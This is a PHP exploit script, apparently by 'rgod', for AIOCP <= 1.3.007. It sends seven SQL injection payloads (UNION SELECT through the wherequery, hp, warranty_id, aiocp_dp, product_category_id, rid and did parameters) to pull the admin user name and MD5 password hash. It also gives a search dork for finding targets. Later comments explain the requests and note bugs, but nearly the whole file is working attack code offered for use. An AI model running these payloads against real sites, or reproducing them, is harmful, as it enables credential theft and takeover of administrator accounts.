<?php
// Banner: print_r() on a plain string just echoes it.
print_r('
--------------------------------------------------------------------------------
AIOCP <= 1.3.007 multiple SQL injection vulnerabilities/hash disclosure xploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "Powered by Tecnick.com AIOCP (All In One Control Panel)"
--------------------------------------------------------------------------------
');

// host and path are mandatory positionals; anything after them is parsed
// as a two-character option flag further down.
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to AIOCP
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]:    "    a proxy
 -T[prefix]:     "    a table prefix other than default (aiocp_)
 -u[id]:         "    a user id to retrieve the hash of (2 -> admin one)
Example:
php '.$argv[0].' localhost /AIOCP/ -P1.1.1.1:80
php '.$argv[0].' localhost /AIOCP/ -p81
php '.$argv[0].' localhost /AIOCP/ -Tcp_
php '.$argv[0].' localhost /AIOCP/ -u3
--------------------------------------------------------------------------------
');
die;
}

// error_reporting(0) silences every notice/warning below (undefined array
// offsets, failed sockets). It does NOT stop the script from dying when the
// ereg()/eregi() calls used later are hit on PHP >= 7, where those functions
// no longer exist. No time limit; 5 s timeout for the fsockopen() calls.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

// Renders a byte string as a two-part dump: a line of space-separated
// two-digit hex values, then a line of printable characters (anything
// <= 0x20 or > 0x7e shown as '.'), each entry three columns wide. A CRLF
// is inserted into both parts after every 15 bytes. The two parts are
// joined by a CRLF. Unused by the rest of this file (debug helper).
function quick_dump($string)
{
  $hexLine = '';
  $asciiLine = '';
  $column = 0;
  $length = strlen($string);
  for ($offset = 0; $offset < $length; $offset++) {
    $byte = ord($string[$offset]);
    // Space (0x20) counts as non-printable here, matching the original cut-off.
    $printable = ($byte > 32) && ($byte <= 126);
    $asciiLine .= $printable ? '  ' . $string[$offset] : '  .';
    $hexLine .= ' ' . str_pad(dechex($byte), 2, '0', STR_PAD_LEFT);
    if (++$column === 15) {
      $column = 0;
      $hexLine .= "\r\n";
      $asciiLine .= "\r\n";
    }
  }
  return $hexLine . "\r\n" . $asciiLine;
}
// Accepts only "dotted-quad:port" for -P. Used with preg_match() in
// sendpacketii(); the outer parentheses serve as the PCRE delimiters, so the
// pattern is not anchored beyond the \b word boundaries.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
// Sends one raw HTTP request ($packet) and leaves the whole response in the
// global $html. Connects directly to $host:$port, or to $proxy ("ip:port")
// when set — callers build an absolute-URL request line for the proxy case
// (see $p). Any connection failure prints a message and ends the script.
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    // Direct: resolve then connect; timeout is the default_socket_timeout
    // set at the top of the file.
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  // fputs() return value is not checked, so a short/failed write is silent.
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    // Direct: read line by line until the server closes the connection
    // (every request carries "Connection: Close").
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    // Proxy: one byte at a time until EOF *and* the end-of-headers
    // "\r\n\r\n" has been seen ("or" here means both must hold to stop).
    // If the proxy closes the socket without ever sending that terminator,
    // fread() keeps returning '' and this loop never exits. eregi() was
    // removed in PHP 7, so on a modern interpreter this line raises an
    // Error instead of looping.
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

// Renders a byte string as a MySQL CHAR(...) list of decimal code points,
// e.g. "AB" -> "CHAR(65,66)". The closing parenthesis is only appended
// after the last byte, so an empty input yields the unterminated "CHAR(".
function my_encode($my_string)
{
  $body = '';
  $lastIndex = strlen($my_string) - 1;
  for ($pos = 0; $pos <= $lastIndex; $pos++) {
    $separator = ($pos === $lastIndex) ? ')' : ',';
    $body .= ord($my_string[$pos]) . $separator;
  }
  return 'CHAR(' . $body;
}

// True when the trimmed input *starts with* 32 lowercase hex characters —
// the pattern is anchored only at the beginning, so trailing garbage is
// ignored and uppercase hex is rejected. ereg() was removed in PHP 7; on a
// modern interpreter this call raises an Error.
function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

// Prints the recovered user name and hash from the globals $admin and $hash.
// Returns nothing; every caller wraps it in die(), so printing is final.
function show_result()
{
global $admin,$hash;
print_r('
------------------------------------------------------------
admin          -> '.$admin.'
pwd hash (md5) -> '.$hash.'
------------------------------------------------------------
');
}

$host=$argv[1];
$path=$argv[2];
$prefix="aiocp_";
$uid=2; //admin
$port=80;
$proxy="";
// Option parsing: the flag is the first two characters of each extra arg,
// the value is whatever follows them. A one-character arg indexes past the
// string; the notice is hidden by error_reporting(0).
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-T")
{
  // BUG: the flag matched is "-T" but the string stripped is lowercase
  // "-t"; str_replace() is case-sensitive, so "-Tcp_" leaves $prefix as
  // "-Tcp_" rather than "cp_".
  $prefix=str_replace("-t","",$argv[$i]);
}
if ($temp=="-u")
{
  $uid=(int)str_replace("-u","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
// Only -u is cast; $port and $prefix are used as given.
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
// Request target: path-relative when connecting directly, absolute URL when
// the request goes through a proxy.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

// Marker strings placed around the two selected columns so the values can
// be cut out of the HTML response with explode() below; my_encode() renders
// them as CHAR() lists.
$t1=my_encode("<USER>");
$t2=my_encode("<HASH>");

//*wherequery* one, this works regardless of php.ini settings
// Multipart POST to cp_dictionary_rss.php, injection in the "wherequery"
// form field. Defender note: the payload travels in the request body, not
// the query string, so only body-aware logging/inspection will show the
// "/**/UNION/**/SELECT" tokens and the <USER>/<HASH> markers.
$sql="WHERE/**/1=0/**/UNION/**/SELECT/**/1,1,CONCAT(".$t1.",user_name,".$t1."),CONCAT(".$t2.",user_password,".$t2."),1/**/FROM/**/".$prefix."users/**/WHERE/**/user_id=".$uid."/*";
$data ="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"wherequery\"\r\n\r\n";
$data.=$sql."\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet ="POST ".$p."public/code/cp_dictionary_rss.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
// Takes everything after the first "<USER>" marker. The hash marker is
// looked up in its HTML-escaped form (htmlentities), presumably because
// this page escapes that part of its output — not verified here. When a
// marker is absent, $temp[1] is undefined (notice suppressed).
$temp=explode("<USER>",$html);
$admin=$temp[1];
$temp=explode(htmlentities("<HASH>"),$html);
$hash=$temp[1];
// show_result() prints and returns nothing; die() then ends the script.
if (is_hash($hash))
{die(show_result());}

// *hp* one, this works regardless of magic_quotes_gpc setring because of urldecode()
// some tricks added for basename()...
// Two GETs to cp_show_page_help.php, injection in the "hp" query parameter
// (quote sent double-encoded as %2527). One request per column: the first
// fetches the hash, the second the user name.
$sql="/9999%2527UNION%20SELECT%20CONCAT(".$t2.",user_password,".$t2.")%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."%20and%20%2527a%2527=%2527a/";
$packet ="GET ".$p."public/code/cp_show_page_help.php?hp=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("<HASH>",$html);
$hash=$temp[1];
$sql="/9999%2527UNION%20SELECT%20CONCAT(".$t1.",user_name,".$t1.")%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."%20and%20%2527a%2527=%2527a/";
$packet ="GET ".$p."public/code/cp_show_page_help.php?hp=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
// The user-name request is sent even when the hash lookup above produced
// nothing; only is_hash() decides whether to stop here.
$temp=explode("<USER>",$html);
$admin=$temp[1];
if (is_hash($hash))
{die(show_result());}

//*warranty_id* one, some dirty strings for unserialize(), works regardless of magic_quotes_gpc settings
// GET to cp_show_ec_warranty.php, injection in "warranty_id". The selected
// value is wrapped in a serialized-array skeleton ($temp ... $temp2) so the
// page's unserialize() accepts it; "s:44:" is the declared length of the
// hash slot (32-char hash plus the two 6-byte markers).
$temp='a:9:{s:3:"aaa";s:0:"";s:3:"eng";s:44:"';
$temp2='";s:3:"aaa";s:0:"";s:3:"aaa";s:0:"";s:3:"aaa";s:33:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";s:3:"aaa";s:0:"";s:3:"aaa";s:0:"";s:3:"aaa";s:0:"";s:3:"aaa";s:0:"";}';
$sql="9999%20UNION%20SELECT%201,1,CONCAT(".my_encode($temp).",".$t2.",user_password,".$t2.",".my_encode($temp2).")%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."/*";
$packet ="GET ".$p."public/code/cp_show_ec_warranty.php?warranty_id=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("<HASH>",$html);
$hash=$temp[1];
// The user name's length is not known, so the declared "s:N:" length is
// re-sent for N = 1..19, stopping at the first response that contains the
// <USER> marker. $admin is reset each pass, so if no length matches it ends
// up empty. eregi() was removed in PHP 7 — on a modern interpreter the
// first iteration raises an Error.
for ($i=1; $i<20; $i++)
{
  $temp='a:9:{s:3:"aaa";s:0:"";s:3:"eng";s:'.$i.':"';
  $sql="9999%20UNION%20SELECT%201,1,CONCAT(".my_encode($temp).",".$t1.",user_name,".$t1.",".my_encode($temp2).")%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."/*";
  $packet ="GET ".$p."public/code/cp_show_ec_warranty.php?warranty_id=$sql HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Accept: text/plain\r\n";
  $packet.="Connection: Close\r\n\r\n";
  sendpacketii($packet);
  $admin="";
  if (eregi("<USER>",$html))
  {
   $temp=explode("<USER>",$html);
   $admin=$temp[1];break;
  }
}
if (is_hash($hash))
{die(show_result());}

//*aiocp_dp* one, this works with magic_quotes_gpc=off
// Multipart POST to cp_dpage.php, injection in the "aiocp_dp" form field.
// Opens with a literal single quote, hence the magic_quotes_gpc dependency
// noted above. Same body-not-query-string caveat for log inspection as the
// wherequery request.
$sql="'/**/and/**/0/**/UNION/**/SELECT/**/1,1,1,CONCAT(".$t2.",user_password,".$t2."),CONCAT(".$t1.",user_name,".$t1."),1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/user_id=$uid/*";
$data ="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"aiocp_dp\"\r\n\r\n";
$data.=$sql."\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet ="POST ".$p."public/code/cp_dpage.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
// <USER> is matched raw, <HASH> in HTML-escaped form — same split as the
// first request; presumably mirrors how this page renders each field.
$temp=explode("<USER>",$html);
$admin=$temp[1];
$temp=explode(htmlentities("<HASH>"),$html);
$hash=$temp[1];
if (is_hash($hash))
{die(show_result());}

//*product_category_id* one, using two UNIONs to reach the vulnerable query, works with magig_quotes_gpc=off
// GET to cp_show_ec_froogle.php, injection in "product_category_id". The
// payload is fully percent-encoded (no my_encode() markers here); unlike
// the other requests it delimits both ends of each value with
// <USER>...</USER> and <PWD_HASH>...</PWD_HASH>, which the parsing below
// relies on.
$sql="9999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1%2C1%2C0%2C1%2C0%2C1%2CCHAR%2897%2C58%2C50%2C58%2C123%2C115%2C58%2C51%2C58%2C34%2C101%2C110%2C103%2C34%2C59%2C115%2C58%2C55%2C58%2C34%2C86%2C97%2C114%2C105%2C111%2C117%2C115%2C34%2C59%2C115%2C58%2C51%2C58%2C34%2C105%2C116%2C97%2C34%2C59%2C115%2C58%2C52%2C58%2C34%2C86%2C97%2C114%2C105%2C34%2C59%2C125%29%2CCHAR%2897%2C58%2C50%2C58%2C123%2C115%2C58%2C51%2C58%2C34%2C101%2C110%2C103%2C34%2C59%2C115%2C58%2C49%2C54%2C58%2C34%2C86%2C97%2C114%2C105%2C111%2C117%2C115%2C32%2C112%2C114%2C111%2C100%2C117%2C99%2C116%2C115%2C34%2C59%2C115%2C58%2C51%2C58%2C34%2C105%2C116%2C97%2C34%2C59%2C115%2C58%2C49%2C51%2C58%2C34%2C80%2C114%2C111%2C100%2C111%2C116%2C116%2C105%2C32%2C118%2C97%2C114%2C105%2C34%2C59%2C125%29%2CCHAR%2897%2C118%2C46%2C103%2C105%2C102%29%2F%2A%2A%2FFROM%2F%2A%2A%2F".$prefix."users%2F%2A%2A%2FWHERE%2F%2A%2A%2Fuser_id%3D".$uid."%2F%2A%27%29UNION+SELECT+1%2CCONCAT%28CHAR%2860%2C85%2C83%2C69%2C82%2C62%29%2Cuser_name%2CCHAR%2860%2C47%2C85%2C83%2C69%2C82%2C62%29%29%2CCONCAT%28CHAR%2860%2C80%2C87%2C68%2C95%2C72%2C65%2C83%2C72%2C62%29%2Cuser_password%2CCHAR%2860%2C47%2C80%2C87%2C68%2C95%2C72%2C65%2C83%2C72%2C62%29%29%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1+FROM+".$prefix."users+WHERE+user_id%3D".$uid."%2F%2A%2A%2FLIMIT%2F%2A%2A%2F1%2F%2A";
$packet ="GET ".$p."public/code/cp_show_ec_froogle.php?product_category_id=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
// Two-step cut: text after the opening tag, then text before the closing
// tag. If the opening tag is missing, $temp[1] is undefined and the second
// explode() runs on null (notices suppressed).
$temp=explode("<USER>",$html);
$temp2=explode("</USER>",$temp[1]);
$admin=$temp2[0];
$temp=explode("<PWD_HASH>",$html);
$temp2=explode("</PWD_HASH>",$temp[1]);
$hash=$temp2[0];
if (is_hash($hash))
{die(show_result());}

//*rid* one,works with magic_quotes_gpc = off
// GET to cp_reviews.php, injection in "rid" (leading single quote, so again
// magic_quotes_gpc dependent). Both markers are matched HTML-escaped here.
$sql="'UNION%20SELECT%201,1,1,1,1,CONCAT(".$t1.",user_name,".$t1."),1,CONCAT(".$t2.",user_password,".$t2."),1,1,1,1%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."/*";
$packet ="GET ".$p."public/code/cp_reviews.php?rid=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode(htmlentities("<USER>"),$html);
$admin=$temp[1];
$temp=explode(htmlentities("<HASH>"),$html);
$hash=$temp[1];
if (is_hash($hash))
{die(show_result());}

//*did* one,works with magic_quotes_gpc = off
// Last attempt: GET to cp_downloads.php, injection in "did" (quote sent as
// %27). Markers matched HTML-escaped, as for the rid request.
$sql="9999%27%20UNION%20SELECT%201,1,CONCAT(".$t1.",user_name,".$t1."),1,1,1,1,CONCAT(".$t2.",user_password,".$t2."),1,1,1,1,1,1,1%20FROM%20".$prefix."users%20WHERE%20user_id=".$uid."/*";
$packet ="GET ".$p."public/code/cp_downloads.php?did=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode(htmlentities("<USER>"),$html);
$admin=$temp[1];
$temp=explode(htmlentities("<HASH>"),$html);
$hash=$temp[1];
if (is_hash($hash))
{die(show_result());}
// Reached only when none of the responses contained a 32-hex-char value;
// because errors are suppressed, a wrong host/path/prefix, a patched
// target and a PHP >= 7 interpreter all end here indistinguishably.
echo "exploit failed...";
?>